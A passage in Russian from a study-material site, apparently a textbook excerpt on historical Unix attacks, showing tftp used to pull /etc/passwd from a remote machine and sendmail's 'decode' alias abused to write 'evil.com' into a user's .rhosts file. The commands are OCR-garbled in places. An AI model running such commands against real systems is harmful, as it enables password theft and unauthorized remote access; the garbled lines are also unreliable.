Студопедия.Орг Главная | Случайная страница | Контакты | Мы поможем в написании вашей работы!  
 

Доступ по чтению и записи к любым файлам. Например, можно было получить файл паролей с удаленной



машины и разместить его в локальном каталоге /tmp:

evil % tftp

tftp> connect victim, corn

tftp> get /etc/passwd /tmp/passwd. Victim

tftp>quit

Это атака по сценарию 2.

Проникновение в систему с помощью sendmail

Sendmail - очень сложная программа, у которой всегда было много проблем с

Безопасностью, включая печально известную команду debug. С ее помощью,

Например анализируя сообщения, можно было получить некоторую информацию об

Удаленной системе, вплоть до номера версии. Это позволяет определить

Наличие в системе известных ошибок.

Кроме того, для старых версий sendmail можно было увидеть, запущен ли

псевдоним "decode", имеющий ряд проблем:

evil % telnet victim, corn 25

Connecting to host victim.corn (194.94.94.94.), port 25 connection open

220 victim.corn Sendmail Sendmail 5.55/victim ready at Fri, 6 Nov 93

PDT

Expn decode

250 ""l/Lisr/bin/uudecode""

Quit

С псевдонимом "decode" система подвергалась риску, так как злоумышленник

Мог изменить любые файлы, доступные для записи владельцу этого псевдонима,

Которым, как правило, являлся демон. Приведенный фрагмент кода помещал

Evil.com в файл.rhosts пользователя hacker, если он был доступен для

записи:

evil X echo "evil.com" I uuencode /home/hacker/, rhosts I mail

[email protected]





Дата публикования: 2014-11-04; Прочитано: 287 | Нарушение авторского права страницы | Мы поможем в написании вашей работы!



studopedia.org - Студопедия.Орг - 2014-2024 год. Студопедия не является автором материалов, которые размещены. Но предоставляет возможность бесплатного использования (0.006 с)...